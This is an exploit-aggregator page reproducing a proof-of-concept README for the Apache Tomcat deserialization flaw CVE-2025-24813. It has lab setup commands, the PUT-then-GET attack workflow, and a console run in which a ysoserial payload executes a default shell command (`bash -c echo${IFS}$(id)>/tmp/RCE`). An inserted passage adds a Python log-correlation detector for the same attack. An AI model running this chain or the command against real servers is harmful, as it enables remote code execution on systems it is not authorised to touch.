## https://sploitus.com/exploit?id=2AC31CA5-D15F-5718-B86D-F39FEF36BC64
# CVE-2025-24813
Proof of Concept (PoC) script for CVE-2025-24813, a vulnerability in Apache Tomcat.

The script has been modified based on the [related link](https://github.com/absholi7ly/POC-CVE-2025-24813) and tailored to my needs.

## Setup Vulnerable Tomcat Environment
The provided environment is based on the official Tomcat 9.0.90 image. It removes the server's read-only restriction and configures it to persist session data to disk. It then deploys the application automatically by copying the ROOT.war file into Tomcat's webapps/ directory.
```
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813
```

## Workflow
1. A `check.txt` file is uploaded with a Content-Range header to check whether the server accepts PUT requests.
2. If the server is writable, a payload for the desired command is generated using `ysoserial`.
3. The malicious session file is uploaded via a PUT request, with its file name tied to the session ID.
4. A GET request is sent with a custom `JSESSIONID`, triggering deserialization.
5. The temporary payload file is deleted from the directory.
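From the defender's side, the workflow above leaves a recognisable trace in the Tomcat access log: a PUT of a `*.session` file that the server accepts (the usage output below shows a 409), followed shortly by a GET from the same client that ends in a 500 when the planted session is deserialized. The following detector is an added example, not part of this PoC; the log lines it runs over are constructed (the "common" AccessLogValve pattern is assumed), and a plain accepted PUT such as the `check.txt` probe is itself a sign that the default servlet is writable.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: ip ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one client follows the PoC's PUT -> GET sequence;
# a second client's PUT is refused (403), so nothing should be flagged for it.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:12:00:01 +0000] "PUT /check.txt HTTP/1.1" 201 -
203.0.113.7 - - [10/Mar/2025:12:00:02 +0000] "PUT /hk1337.session HTTP/1.1" 409 -
203.0.113.7 - - [10/Mar/2025:12:00:03 +0000] "GET / HTTP/1.1" 500 -
198.51.100.4 - - [10/Mar/2025:12:00:04 +0000] "PUT /x.session HTTP/1.1" 403 -
198.51.100.4 - - [10/Mar/2025:12:00:05 +0000] "GET /index.jsp HTTP/1.1" 200 1234
"""

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev

def find_suspicious_sequences(lines, window_seconds=60):
    """Return (ip, put_path, get_path) for every client that PUTs a *.session file
    the server accepts (2xx, or 409 as in the PoC output) and then, within the
    window, gets a 500 on a GET: the trace of the planted session being deserialized."""
    accepted_puts = defaultdict(list)   # ip -> [(timestamp, path), ...]
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        accepted = 200 <= ev["status"] < 300 or ev["status"] == 409
        if ev["method"] == "PUT" and ev["path"].endswith(".session") and accepted:
            accepted_puts[ev["ip"]].append((ev["ts"], ev["path"]))
        elif ev["method"] == "GET" and ev["status"] == 500:
            for put_ts, put_path in accepted_puts[ev["ip"]]:
                if timedelta(0) <= ev["ts"] - put_ts <= timedelta(seconds=window_seconds):
                    hits.append((ev["ip"], put_path, ev["path"]))
    return hits
```

Feeding a real access log through `find_suspicious_sequences` yields one tuple per matched PUT/GET pair; the same pattern can be expressed as a SIEM correlation rule once the log pattern is adjusted.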

## Usage
```
$ python3 cve_2025_24813.py

                    --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---

Enter target URL (e.g., http://target.com:8080): http://target.com:8080
Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
Enter path to ysoserial.jar (default: ysoserial.jar): 
Enter ysoserial gadget chain (default: CommonsCollections6): 
[*] Session ID: hk1337
[+] Server is writable via PUT: http://target.com:8080/check.txt
[*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
```

## PoC
https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616